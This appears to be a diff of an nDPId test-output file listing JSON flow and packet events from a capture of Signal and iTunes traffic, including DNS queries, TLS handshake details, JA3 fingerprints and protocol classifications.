+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569051264091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264091,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7AAbuO10RdAAAAALAC\/\/\/fDwAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264093,"flow_last_seen":1569051264093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264093,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAACz4rsAAEAREhzAqAIBwKgCEQA128cAn9JUAMGBgAABAAYAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAcAMAAEAAQAAAB0ABDavL27ADAABAAEAAAAdAAQi4fCtwAwAAQABAAAAHQAEaxdHWcAMAAEAAQAAAB0ABCOpAyjADAABAAEAAAAdAAQ0zyk7wAwAAQABAAAAHQAENMjD8Q=="} 00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569051264115,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569051264115,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4YPoAAEABlGjAqAIRwKgCAQMDIGEAAAAARQAAs+K7AABAERIcwKgCAcCoAhEANdvHAJ8AAA=="} 00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 